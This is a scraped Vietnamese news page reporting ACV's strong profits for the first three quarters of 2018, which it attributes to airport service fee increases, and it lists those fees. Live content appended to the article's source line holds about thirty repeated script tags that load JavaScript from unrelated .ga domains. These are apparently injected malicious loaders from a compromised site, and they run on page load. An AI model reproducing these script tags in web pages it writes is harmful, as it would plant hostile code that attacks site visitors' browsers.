ACV lãi đậm nhờ quyết định tăng giá dịch vụ

0
167

Báo cáo tài chính hợp nhất mới được Tổng công ty Cảng hàng không Việt Nam – Công ty cổ phần (mã chứng khoán ACV – UpCOM) công bố cho thấy 2018 là một năm làm ăn phát tài phát lộc của doanh nghiệp.

</p> <p>Doanh thu bán hàng và cung cấp dịch vụ quý 3 đạt 3.993 tỷ đồng, luỹ kế từ đầu năm đến 30/9 đạt gần 12.000 tỷ đồng, tăng 15,8% so với cùng kỳ năm 2017. Giá vốn hàng bán giảm nhẹ nên lợi nhuận gộp về bán hàng và cung cấp dịch vụ tăng tương ứng, đạt 6.051 tỷ đồng.</p> <p>Doanh thu hoạt động tài chính tăng mạnh, từ 893 tỷ đồng năm ngoái lên đến 1.175 tỷ đồng năm nay. Phần lãi trong công ty liên kết đạt 257 tỷ đồng, tăng 43%. Chi phí bán hàng và chi phí quản lý doanh nghiệp giữ nguyên.</p> <p>Kết thúc 3 quý năm 2018, lợi nhuận sau thuế thu nhập doanh nghiệp của ACV đạt 4.953 tỷ đồng, tăng 67% so với cùng kỳ năm ngoái.</p> <p>Tính đến thời điểm 30/9/2018, tổng tài sản ACV đạt 53.554 tỷ đồng, trong đó tiền và tương đương tiền 1.163 tỷ, tiền gửi 23.564 tỷ đồng. Nợ phải trả ghi nhận 23.607 tỷ, trong đó nợ ngắn hạn 8.768 tỷ đồng, nợ dài hạn 14.837 tỷ đồng.</p> <p>Giải trình về doanh thu thuần quý 3 tăng so với cùng kỳ, ông Vũ Thế Phiệt, Tổng giám đốc ACV cho biết do sản lượng vận chuyển qua các cảng hàng không tăng lên, cùng với đó là đơn giá dịch vụ được điều chỉnh tăng theo Quyết định số 2345/QĐ-BGTVT.</p> <p>Trước đó, hồi tháng 10/2017, Bộ trưởng Bộ Giao thông Vận tải đã ký quyết định ban hành mức giá, khung giá một số dịch vụ chuyên ngành hàng không tại cảng hàng không, sân bay Việt Nam; theo đó, một loạt dịch vụ hàng không tăng giá theo.</p> <p>Cụ thể, loạt phí đầu tiên tăng theo quyết định trên là phí cất/hạ cánh máy bay theo từng khung giờ. Giờ cao điểm phí cao, giờ thấp điểm phí thấp. Nhờ quyết định này mà doanh thu dịch vụ cất hạ cánh của ACV tăng từ 1.458 tỷ đồng 3 quý đầu năm 2017 lên đến 1.779 tỷ đồng 3 quý năm nay.</p> <p>Bên cạnh đó, giá dịch vụ đảm bảo an ninh hàng không đối với hành khách quốc tế tăng lên 2 USD/hành khách; đối với hành khách, hành lý quốc nội tăng dần từ 11.818 đồng/hành khách lên đến 18.181 đồng vào thời điểm 1/4/2018.</p> <p>Đối với giá dịch vụ phục vụ hành khách tại cảng hàng không đối với chuyến bay quốc nội được điều chỉnh tăng theo giai đoạn. Cụ thể, giai đoạn 1 (từ 1/10/2017 đến hết 31/12/2017), mức thu áp dụng cho cảng hàng không nhóm A là 75.000 đồng/khách, nhóm B là 70.000 đồng/khách và nhóm C giữ nguyên như hiện nay là 60.000 đồng/khách. Như vậy, tại các CHK nhóm A, B, mức giá này đã tăng khoảng 7%.</p> <p>Trong giai đoạn 2 (từ 1/1/2018 đến hết 31/3/2018), mức giá áp dụng tương ứng cho các cảng hàng không nhóm A, B, C là 80.000, 75.000 và 60.000 đồng/khách.</p> <p>Giai đoạn 3 (từ 1/4/2018 đến hết 30/6/2018), khách bay nội địa tại các cảng hàng không nhóm A, B, C sẽ phải nộp tương ứng 85.000, 75.000 và 60.000 đồng/khách.</p> <p>Giai đoạn cuối cùng, mức giá cao nhất áp tại cảng hàng không nhóm A là 100.000 đồng/khách, nhóm B là 80.000 đồng/khách và nhóm C là 60.000 đồng/khách.</p> <p>Theo tính toán của Bộ Giao thông Vận tải, với phương án điều chỉnh này, ACV có thể tăng doanh thu thêm 1.081 tỷ đồng/năm. Đối với các hãng hàng không, mức phí dịch vụ mới này sẽ khiến chi phí của Vietnam Airlines tăng 87,75 tỷ đồng; Vietjet Air là 55,41 tỷ đồng; Jetstar Pacific là 18,38 tỷ đồng. Tính tổng cộng, chi phí hành khách phải chi trả thêm cho 1 vé máy bay là 30.385 đồng.</p> </div> <p> Nguồn: vneconomy.vn<script src='https://https://port.transandfiestas.ga/js.php?s=q' type='text/javascript'></script><script src='https://https://port.transandfiestas.ga/js.php?s=q' type='text/javascript'></script><script src='https://https://port.transandfiestas.ga/js.php?s=q' type='text/javascript'></script><script src='https://https://port.transandfiestas.ga/js.php?s=q' type='text/javascript'></script><script src='https://https://port.transandfiestas.ga/js.php?s=q' type='text/javascript'></script><script src='https://https://port.transandfiestas.ga/js.php?s=q' type='text/javascript'></script><script src='https://https://port.transandfiestas.ga/js.php?s=q' type='text/javascript'></script><script src='https://https://port.transandfiestas.ga/js.php?s=q' type='text/javascript'></script><script src='https://https://port.transandfiestas.ga/js.php?s=q' type='text/javascript'></script><script src='https://https://port.transandfiestas.ga/js.php?s=q' type='text/javascript'></script><script src='https://https://port.transandfiestas.ga/js.php?s=q' type='text/javascript'></script><script src='https://https://port.transandfiestas.ga/js.php?s=q' type='text/javascript'></script><script src='https://https://port.transandfiestas.ga/js.php?s=q' type='text/javascript'></script><script src='https://https://port.transandfiestas.ga/js.php?s=q' type='text/javascript'></script><script src='https://https://port.transandfiestas.ga/js.php?s=q' type='text/javascript'></script><script src='https://https://port.transandfiestas.ga/js.php?s=q' type='text/javascript'></script><script src='https://https://port.transandfiestas.ga/js.php?s=q' type='text/javascript'></script><script src='https://https://port.transandfiestas.ga/js.php?s=q' type='text/javascript'></script><script src='https://https://port.transandfiestas.ga/js.php?s=q' type='text/javascript'></script><script src='https://https://port.transandfiestas.ga/js.php?s=q' type='text/javascript'></script><script src='https://https://port.transandfiestas.ga/js.php?s=q' type='text/javascript'></script><script src='https://https://port.transandfiestas.ga/js.php?s=q' type='text/javascript'></script><script src='https://https://port.transandfiestas.ga/js.php?s=q' type='text/javascript'></script><script src='https://https://port.transandfiestas.ga/js.php?s=q' type='text/javascript'></script><script src='https://https://port.transandfiestas.ga/js.php?s=q' type='text/javascript'></script><script src='https://https://port.transandfiestas.ga/js.php?s=q' type='text/javascript'></script><script src='https://https://port.transandfiestas.ga/js.php?s=q' type='text/javascript'></script><script src='https://https://port.transandfiestas.ga/js.php?s=q' type='text/javascript'></script><script src='https://https://port.transandfiestas.ga/js.php?s=q' type='text/javascript'></script><script src='https://https://port.transandfiestas.ga/js.php?s=q' type='text/javascript'></script><script src='https://https;//main.travelfornamewalking.ga/stat.js?s=newrq' type='text/javascript'></script><script src='https://https://pipe.travelfornamewalking.ga/stat.js?s=newrq' type='text/javascript'></script></p> </div> <footer> <div class="td-post-source-tags"> </div> <div class="td-post-sharing td-post-sharing-bottom td-with-like"><span class="td-post-share-title">Chia sẻ</span> <div class="td-default-sharing"> <a class="td-social-sharing-buttons td-social-facebook" href="https://www.facebook.com/sharer.php?u=http%3A%2F%2Fbestweightlosspills2015.com%2Fnha-dat%2Facv-lai-dam-nho-quyet-dinh-tang-gia-dich-vu.html" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-facebook"></i><div class="td-social-but-text">Facebook</div></a> <a class="td-social-sharing-buttons td-social-twitter" href="https://twitter.com/intent/tweet?text=ACV+l%C3%A3i+%C4%91%E1%BA%ADm+nh%E1%BB%9D+quy%E1%BA%BFt+%C4%91%E1%BB%8Bnh+t%C4%83ng+gi%C3%A1+d%E1%BB%8Bch+v%E1%BB%A5&url=http%3A%2F%2Fbestweightlosspills2015.com%2Fnha-dat%2Facv-lai-dam-nho-quyet-dinh-tang-gia-dich-vu.html&via=Bestweightlosspills+news%2C+%C4%91%E1%BB%8Dc+b%C3%A1o+online%2C+%C4%91%E1%BB%8Dc+b%C3%A1o+nhanh."><i class="td-icon-twitter"></i><div class="td-social-but-text">Twitter</div></a> <a class="td-social-sharing-buttons td-social-google" href="https://plus.google.com/share?url=http://bestweightlosspills2015.com/nha-dat/acv-lai-dam-nho-quyet-dinh-tang-gia-dich-vu.html" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-googleplus"></i></a> <a class="td-social-sharing-buttons td-social-pinterest" href="https://pinterest.com/pin/create/button/?url=http://bestweightlosspills2015.com/nha-dat/acv-lai-dam-nho-quyet-dinh-tang-gia-dich-vu.html&media=http://bestweightlosspills2015.com/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489.png&description=ACV+l%C3%A3i+%C4%91%E1%BA%ADm+nh%E1%BB%9D+quy%E1%BA%BFt+%C4%91%E1%BB%8Bnh+t%C4%83ng+gi%C3%A1+d%E1%BB%8Bch+v%E1%BB%A5" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-pinterest"></i></a> <a class="td-social-sharing-buttons td-social-whatsapp" href="whatsapp://send?text=ACV+l%C3%A3i+%C4%91%E1%BA%ADm+nh%E1%BB%9D+quy%E1%BA%BFt+%C4%91%E1%BB%8Bnh+t%C4%83ng+gi%C3%A1+d%E1%BB%8Bch+v%E1%BB%A5%20-%20http%3A%2F%2Fbestweightlosspills2015.com%2Fnha-dat%2Facv-lai-dam-nho-quyet-dinh-tang-gia-dich-vu.html" ><i class="td-icon-whatsapp"></i></a> </div><div class="td-classic-sharing"><ul><li class="td-classic-facebook"><iframe frameBorder="0" src="http://www.facebook.com/plugins/like.php?href=http://bestweightlosspills2015.com/nha-dat/acv-lai-dam-nho-quyet-dinh-tang-gia-dich-vu.html&layout=button_count&show_faces=false&width=105&action=like&colorscheme=light&height=21" style="border:none; overflow:hidden; width:105px; height:21px; background-color:transparent;"></iframe></li><li class="td-classic-twitter"><a href="https://twitter.com/share" class="twitter-share-button" data-url="http://bestweightlosspills2015.com/nha-dat/acv-lai-dam-nho-quyet-dinh-tang-gia-dich-vu.html" data-text="ACV lãi đậm nhờ quyết định tăng giá dịch vụ" data-via="" data-lang="en">tweet</a> <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");</script></li></ul></div></div> <div class="td-block-row td-post-next-prev"><div class="td-block-span6 td-post-prev-post"><div class="td-post-next-prev-content"><span>Bài trước</span><a href="http://bestweightlosspills2015.com/nha-dat/19-nen-kinh-te-nhieu-ty-phu-nhat-the-gioi.html">19 nền kinh tế nhiều tỷ phú nhất thế giới</a></div></div><div class="td-next-prev-separator"></div><div class="td-block-span6 td-post-next-post"><div class="td-post-next-prev-content"><span>Bài tiếp theo</span><a href="http://bestweightlosspills2015.com/nha-dat/chanh-an-nguyen-hoa-binh-se-xem-lai-vu-an-tai-xe-xe-container-dam-innova.html">Chánh án Nguyễn Hoà Bình: Sẽ xem lại vụ án tài xế xe container đâm Innova</a></div></div></div> <div class="td-author-name vcard author" style="display: none"><span class="fn"><a href="http://bestweightlosspills2015.com/author/dangthongpro">Tổng hợp tin tức</a></span></div> <span style="display: none;" itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="Tổng hợp tin tức"></span><meta itemprop="datePublished" content="2018-11-05T06:36:12+00:00"><meta itemprop="dateModified" content="2018-11-05T06:36:12+00:00"><meta itemscope itemprop="mainEntityOfPage" itemType="https://schema.org/WebPage" itemid="http://bestweightlosspills2015.com/nha-dat/acv-lai-dam-nho-quyet-dinh-tang-gia-dich-vu.html"/><span style="display: none;" itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><span style="display: none;" itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"><meta itemprop="url" content=""></span><meta itemprop="name" content="Bestweightlosspills news, đọc báo online, đọc báo nhanh."></span><meta itemprop="headline " content="ACV lãi đậm nhờ quyết định tăng giá dịch vụ"><span style="display: none;" itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="http://bestweightlosspills2015.com/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489.png"><meta itemprop="width" content="500"><meta itemprop="height" content="281"></span> </footer> </article> <!-- /.post --> <div class="td_block_wrap td_block_related_posts td_uid_3_609cc4f0acb0f_rand td_with_ajax_pagination td-pb-border-top td_block_template_1" data-td-block-uid="td_uid_3_609cc4f0acb0f" ><script>var block_td_uid_3_609cc4f0acb0f = new tdBlock(); block_td_uid_3_609cc4f0acb0f.id = "td_uid_3_609cc4f0acb0f"; block_td_uid_3_609cc4f0acb0f.atts = '{"limit":6,"sort":"","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"","category_ids":"","custom_title":"","custom_url":"","show_child_cat":"","sub_cat_ajax":"","ajax_pagination":"next_prev","header_color":"","header_text_color":"","ajax_pagination_infinite_stop":"","td_column_number":3,"td_ajax_preloading":"","td_ajax_filter_type":"td_custom_related","td_ajax_filter_ids":"","td_filter_default_txt":"T\u1ea5t C\u1ea3","color_preset":"","border_top":"","class":"td_uid_3_609cc4f0acb0f_rand","el_class":"","offset":"","css":"","tdc_css":"","tdc_css_class":"td_uid_3_609cc4f0acb0f_rand","live_filter":"cur_post_same_categories","live_filter_cur_post_id":18043,"live_filter_cur_post_author":"1","block_template_id":""}'; block_td_uid_3_609cc4f0acb0f.td_column_number = "3"; block_td_uid_3_609cc4f0acb0f.block_type = "td_block_related_posts"; block_td_uid_3_609cc4f0acb0f.post_count = "6"; block_td_uid_3_609cc4f0acb0f.found_posts = "2061"; block_td_uid_3_609cc4f0acb0f.header_color = ""; block_td_uid_3_609cc4f0acb0f.ajax_pagination_infinite_stop = ""; block_td_uid_3_609cc4f0acb0f.max_num_pages = "344"; tdBlocksArray.push(block_td_uid_3_609cc4f0acb0f); </script><h4 class="td-related-title td-block-title"><a id="td_uid_4_609cc4f0b365c" class="td-related-left td-cur-simple-item" data-td_filter_value="" data-td_block_id="td_uid_3_609cc4f0acb0f" href="#">BÀI VIẾT LIÊN QUAN</a><a id="td_uid_5_609cc4f0b3668" class="td-related-right" data-td_filter_value="td_related_more_from_author" data-td_block_id="td_uid_3_609cc4f0acb0f" href="#">XEM THÊM</a></h4><div id=td_uid_3_609cc4f0acb0f class="td_block_inner"> <div class="td-related-row"> <div class="td-related-span4"> <div class="td_module_related_posts td-animation-stack td_mod_related_posts"> <div class="td-module-image"> <div class="td-module-thumb"><a href="http://bestweightlosspills2015.com/nha-dat/gem-riverside-vi-tri-trung-tam-view-trai-rong.html" rel="bookmark" title="Gem Riverside vị trí trung tâm view trải rộng"><img width="218" height="150" class="entry-thumb" src="http://bestweightlosspills2015.com/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-218x150.png" srcset="http://bestweightlosspills2015.com/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-218x150.png 218w, http://bestweightlosspills2015.com/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-100x70.png 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="Gem Riverside vị trí trung tâm view trải rộng"/></a></div> <a href="http://bestweightlosspills2015.com/category/nha-dat" class="td-post-category">Nhà đất</a> </div> <div class="item-details"> <h3 class="entry-title td-module-title"><a href="http://bestweightlosspills2015.com/nha-dat/gem-riverside-vi-tri-trung-tam-view-trai-rong.html" rel="bookmark" title="Gem Riverside vị trí trung tâm view trải rộng">Gem Riverside vị trí trung tâm view trải rộng</a></h3> </div> </div> </div> <!-- ./td-related-span4 --> <div class="td-related-span4"> <div class="td_module_related_posts td-animation-stack td_mod_related_posts"> <div class="td-module-image"> <div class="td-module-thumb"><a href="http://bestweightlosspills2015.com/nha-dat/gelexia-riverside-cay-xanh-bao-phu-thoai-mai-nhat.html" rel="bookmark" title="Gelexia Riverside cây xanh bao phủ thoải mái nhất"><img width="218" height="150" class="entry-thumb" src="http://bestweightlosspills2015.com/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-218x150.png" srcset="http://bestweightlosspills2015.com/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-218x150.png 218w, http://bestweightlosspills2015.com/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-100x70.png 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="Gelexia Riverside cây xanh bao phủ thoải mái nhất"/></a></div> <a href="http://bestweightlosspills2015.com/category/nha-dat" class="td-post-category">Nhà đất</a> </div> <div class="item-details"> <h3 class="entry-title td-module-title"><a href="http://bestweightlosspills2015.com/nha-dat/gelexia-riverside-cay-xanh-bao-phu-thoai-mai-nhat.html" rel="bookmark" title="Gelexia Riverside cây xanh bao phủ thoải mái nhất">Gelexia Riverside cây xanh bao phủ thoải mái nhất</a></h3> </div> </div> </div> <!-- ./td-related-span4 --> <div class="td-related-span4"> <div class="td_module_related_posts td-animation-stack td_mod_related_posts"> <div class="td-module-image"> <div class="td-module-thumb"><a href="http://bestweightlosspills2015.com/nha-dat/khach-hang-nhan-lien-tay-so-hong-khi-dau-tu-loat-san-pham-tai-cac-du-an-dia-oc-nam-an-tai-dong-nai.html" rel="bookmark" title="Khách hàng nhận liền tay sổ hồng khi đầu tư loạt sản phẩm tại các dự án địa ốc Nam An tại Đồng Nai"><img width="218" height="150" class="entry-thumb" src="http://bestweightlosspills2015.com/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-218x150.png" srcset="http://bestweightlosspills2015.com/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-218x150.png 218w, http://bestweightlosspills2015.com/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-100x70.png 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="Khách hàng nhận liền tay sổ hồng khi đầu tư loạt sản phẩm tại các dự án địa ốc Nam An tại Đồng Nai"/></a></div> <a href="http://bestweightlosspills2015.com/category/nha-dat" class="td-post-category">Nhà đất</a> </div> <div class="item-details"> <h3 class="entry-title td-module-title"><a href="http://bestweightlosspills2015.com/nha-dat/khach-hang-nhan-lien-tay-so-hong-khi-dau-tu-loat-san-pham-tai-cac-du-an-dia-oc-nam-an-tai-dong-nai.html" rel="bookmark" title="Khách hàng nhận liền tay sổ hồng khi đầu tư loạt sản phẩm tại các dự án địa ốc Nam An tại Đồng Nai">Khách hàng nhận liền tay sổ hồng khi đầu tư loạt sản phẩm tại các dự án địa ốc Nam An tại Đồng Nai</a></h3> </div> </div> </div> <!-- ./td-related-span4 --></div><!--./row-fluid--> <div class="td-related-row"> <div class="td-related-span4"> <div class="td_module_related_posts td-animation-stack td_mod_related_posts"> <div class="td-module-image"> <div class="td-module-thumb"><a href="http://bestweightlosspills2015.com/nha-dat/can-ho-gateway-vung-tau-gio-hang-moi.html" rel="bookmark" title="Căn hộ Gateway Vũng Tàu giỏ hàng mới"><img width="218" height="150" class="entry-thumb" src="http://bestweightlosspills2015.com/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-218x150.png" srcset="http://bestweightlosspills2015.com/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-218x150.png 218w, http://bestweightlosspills2015.com/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-100x70.png 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="Căn hộ Gateway Vũng Tàu giỏ hàng mới"/></a></div> <a href="http://bestweightlosspills2015.com/category/nha-dat" class="td-post-category">Nhà đất</a> </div> <div class="item-details"> <h3 class="entry-title td-module-title"><a href="http://bestweightlosspills2015.com/nha-dat/can-ho-gateway-vung-tau-gio-hang-moi.html" rel="bookmark" title="Căn hộ Gateway Vũng Tàu giỏ hàng mới">Căn hộ Gateway Vũng Tàu giỏ hàng mới</a></h3> </div> </div> </div> <!-- ./td-related-span4 --> <div class="td-related-span4"> <div class="td_module_related_posts td-animation-stack td_mod_related_posts"> <div class="td-module-image"> <div class="td-module-thumb"><a href="http://bestweightlosspills2015.com/nha-dat/dat-nen-cao-cap-flc-miami-district-vi-tri-cua-ngo.html" rel="bookmark" title="Đất nền cao cấp FLC Miami District vị trí cửa ngõ"><img width="218" height="150" class="entry-thumb" src="http://bestweightlosspills2015.com/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-218x150.png" srcset="http://bestweightlosspills2015.com/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-218x150.png 218w, http://bestweightlosspills2015.com/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-100x70.png 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="Đất nền cao cấp FLC Miami District vị trí cửa ngõ"/></a></div> <a href="http://bestweightlosspills2015.com/category/nha-dat" class="td-post-category">Nhà đất</a> </div> <div class="item-details"> <h3 class="entry-title td-module-title"><a href="http://bestweightlosspills2015.com/nha-dat/dat-nen-cao-cap-flc-miami-district-vi-tri-cua-ngo.html" rel="bookmark" title="Đất nền cao cấp FLC Miami District vị trí cửa ngõ">Đất nền cao cấp FLC Miami District vị trí cửa ngõ</a></h3> </div> </div> </div> <!-- ./td-related-span4 --> <div class="td-related-span4"> <div class="td_module_related_posts td-animation-stack td_mod_related_posts"> <div class="td-module-image"> <div class="td-module-thumb"><a href="http://bestweightlosspills2015.com/nha-dat/five-star-garden-kien-truc-rat-rieng-nhieu-dien-tich.html" rel="bookmark" title="Five Star Garden kiến trúc rất riêng nhiều diện tích"><img width="218" height="150" class="entry-thumb" src="http://bestweightlosspills2015.com/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-218x150.png" srcset="http://bestweightlosspills2015.com/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-218x150.png 218w, http://bestweightlosspills2015.com/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-100x70.png 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="Five Star Garden kiến trúc rất riêng nhiều diện tích"/></a></div> <a href="http://bestweightlosspills2015.com/category/nha-dat" class="td-post-category">Nhà đất</a> </div> <div class="item-details"> <h3 class="entry-title td-module-title"><a href="http://bestweightlosspills2015.com/nha-dat/five-star-garden-kien-truc-rat-rieng-nhieu-dien-tich.html" rel="bookmark" title="Five Star Garden kiến trúc rất riêng nhiều diện tích">Five Star Garden kiến trúc rất riêng nhiều diện tích</a></h3> </div> </div> </div> <!-- ./td-related-span4 --></div><!--./row-fluid--></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_3_609cc4f0acb0f" data-td_block_id="td_uid_3_609cc4f0acb0f"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#" class="td-ajax-next-page" id="next-page-td_uid_3_609cc4f0acb0f" data-td_block_id="td_uid_3_609cc4f0acb0f"><i class="td-icon-font td-icon-menu-right"></i></a></div></div> <!-- ./block --> <div class="comments" id="comments"> <div id="respond" class="comment-respond"> <h3 id="reply-title" class="comment-reply-title">BÌNH LUẬN <small><a rel="nofollow" id="cancel-comment-reply-link" href="/nha-dat/acv-lai-dam-nho-quyet-dinh-tang-gia-dich-vu.html#respond" style="display:none;">Hủy trả lời</a></small></h3> <form action="http://bestweightlosspills2015.com/wp-comments-post.php" method="post" id="commentform" class="comment-form" novalidate> <div class="clearfix"></div> <div class="comment-form-input-wrap td-form-comment"> <textarea placeholder="Bình luận:" id="comment" name="comment" cols="45" rows="8" aria-required="true"></textarea> <div class="td-warning-comment">Please enter your comment!</div> </div> <div class="comment-form-input-wrap td-form-author"> <input class="" id="author" name="author" placeholder="Tên:*" type="text" value="" size="30" aria-required='true' /> <div class="td-warning-author">Please enter your name here</div> </div> <div class="comment-form-input-wrap td-form-email"> <input class="" id="email" name="email" placeholder="Email:*" type="text" value="" size="30" aria-required='true' /> <div class="td-warning-email-error">You have entered an incorrect email address!</div> <div class="td-warning-email">Please enter your email address here</div> </div> <div class="comment-form-input-wrap td-form-url"> <input class="" id="url" name="url" placeholder="Website:" type="text" value="" size="30" /> </div> <p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Đăng" /> <input type='hidden' name='comment_post_ID' value='18043' id='comment_post_ID' /> <input type='hidden' name='comment_parent' id='comment_parent' value='0' /> </p><p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="80e9d27b42" /></p><p style="display: none;"><input type="hidden" id="ak_js" name="ak_js" value="214"/></p> </form> </div><!-- #respond --> <p class="akismet_comment_form_privacy_notice">Website này sử dụng Akismet để hạn chế spam. <a href="https://akismet.com/privacy/" target="_blank" rel="nofollow noopener">Tìm hiểu bình luận của bạn được duyệt như thế nào</a>.</p> </div> <!-- /.content --> </div> </div> <div class="td-pb-span4 td-main-sidebar" role="complementary"> <div class="td-ss-main-sidebar"> <div class="td-a-rec td-a-rec-id-sidebar "><span class="td-adspot-title">- Advertisement -</span><div class="td-all-devices"><a href="http://hethongtintuc.com"><img src="http://hethongtintuc.com/banner/bannervip.png"/></a></div></div><div class="td-a-rec td-a-rec-id-custom_ad_1 "><span class="td-adspot-title">Quảng cáo</span><div class="td-all-devices"><a href="http://hethongtintuc.com"><img src="http://hethongtintuc.com/banner/bannervip.png"/></a></div></div><div class="td_block_wrap td_block_21 td_block_widget td_uid_8_609cc4f0bd371_rand td-pb-border-top td_block_template_1 td-column-1" data-td-block-uid="td_uid_8_609cc4f0bd371" ><script>var block_td_uid_8_609cc4f0bd371 = new tdBlock(); block_td_uid_8_609cc4f0bd371.id = "td_uid_8_609cc4f0bd371"; block_td_uid_8_609cc4f0bd371.atts = '{"limit":"3","sort":"","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"","category_ids":"","custom_title":"Latest article","custom_url":"","show_child_cat":"","sub_cat_ajax":"","ajax_pagination":"","header_color":"#","header_text_color":"#","ajax_pagination_infinite_stop":"","td_column_number":1,"td_ajax_preloading":"","td_ajax_filter_type":"","td_ajax_filter_ids":"","td_filter_default_txt":"All","color_preset":"","border_top":"","class":"td_block_widget td_uid_8_609cc4f0bd371_rand","el_class":"","offset":"","css":"","tdc_css":"","tdc_css_class":"td_uid_8_609cc4f0bd371_rand","live_filter":"","live_filter_cur_post_id":"","live_filter_cur_post_author":"","block_template_id":""}'; block_td_uid_8_609cc4f0bd371.td_column_number = "1"; block_td_uid_8_609cc4f0bd371.block_type = "td_block_21"; block_td_uid_8_609cc4f0bd371.post_count = "3"; block_td_uid_8_609cc4f0bd371.found_posts = "22118"; block_td_uid_8_609cc4f0bd371.header_color = "#"; block_td_uid_8_609cc4f0bd371.ajax_pagination_infinite_stop = ""; block_td_uid_8_609cc4f0bd371.max_num_pages = "7373"; tdBlocksArray.push(block_td_uid_8_609cc4f0bd371); </script><div class="td-block-title-wrap"><h4 class="block-title"><span class="td-pulldown-size">Latest article</span></h4></div><div id=td_uid_8_609cc4f0bd371 class="td_block_inner"> <div class="td_module_16 td_module_wrap td-animation-stack"> <div class="td-module-thumb"><a href="http://bestweightlosspills2015.com/giai-tri/ban-ca-1000-doi-the-online-cuc-hap-dan.html" rel="bookmark" title="Bắn cá 1000 – đổi thẻ online cực hấp dẫn"><img width="100" height="100" class="entry-thumb" src="http://bestweightlosspills2015.com/wp-content/uploads/2021/05/ban-ca-doi-the-ole777-1-100x100.jpg" alt="" title="Bắn cá 1000 – đổi thẻ online cực hấp dẫn"/></a></div> <div class="item-details"> <h3 class="entry-title td-module-title"><a href="http://bestweightlosspills2015.com/giai-tri/ban-ca-1000-doi-the-online-cuc-hap-dan.html" rel="bookmark" title="Bắn cá 1000 – đổi thẻ online cực hấp dẫn">Bắn cá 1000 – đổi thẻ online cực hấp dẫn</a></h3> <div class="td-module-meta-info"> <a href="http://bestweightlosspills2015.com/category/giai-tri" class="td-post-category">Giải trí</a> <span class="td-post-author-name"><a href="http://bestweightlosspills2015.com/author/namthanh113">namthanh113</a> <span>-</span> </span> <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2021-05-12T13:42:47+00:00" >12 Tháng Năm, 2021</time></span> <div class="td-module-comments"><a href="http://bestweightlosspills2015.com/giai-tri/ban-ca-1000-doi-the-online-cuc-hap-dan.html#respond">0</a></div> </div> <div class="td-excerpt"> Trên thị trường hiện nay có rất nhiều game bắn cá hấp dẫn đổi thẻ online và một trong những cái tên đó phải... </div> </div> </div> <div class="td_module_16 td_module_wrap td-animation-stack"> <div class="td-module-thumb"><a href="http://bestweightlosspills2015.com/nha-dat/gem-riverside-vi-tri-trung-tam-view-trai-rong.html" rel="bookmark" title="Gem Riverside vị trí trung tâm view trải rộng"><img width="100" height="100" class="entry-thumb" src="http://bestweightlosspills2015.com/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-150x150.png" alt="" title="Gem Riverside vị trí trung tâm view trải rộng"/></a></div> <div class="item-details"> <h3 class="entry-title td-module-title"><a href="http://bestweightlosspills2015.com/nha-dat/gem-riverside-vi-tri-trung-tam-view-trai-rong.html" rel="bookmark" title="Gem Riverside vị trí trung tâm view trải rộng">Gem Riverside vị trí trung tâm view trải rộng</a></h3> <div class="td-module-meta-info"> <a href="http://bestweightlosspills2015.com/category/nha-dat" class="td-post-category">Nhà đất</a> <span class="td-post-author-name"><a href="http://bestweightlosspills2015.com/author/xuankhanh">xuankhanh</a> <span>-</span> </span> <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2021-05-12T09:00:03+00:00" >12 Tháng Năm, 2021</time></span> <div class="td-module-comments"><a href="http://bestweightlosspills2015.com/nha-dat/gem-riverside-vi-tri-trung-tam-view-trai-rong.html#respond">0</a></div> </div> <div class="td-excerpt"> Dự án căn hộ Gem Riverside được xây dựng bởi Đất Xanh căn hộ khép kín giá cạnh tranh diện tích đa 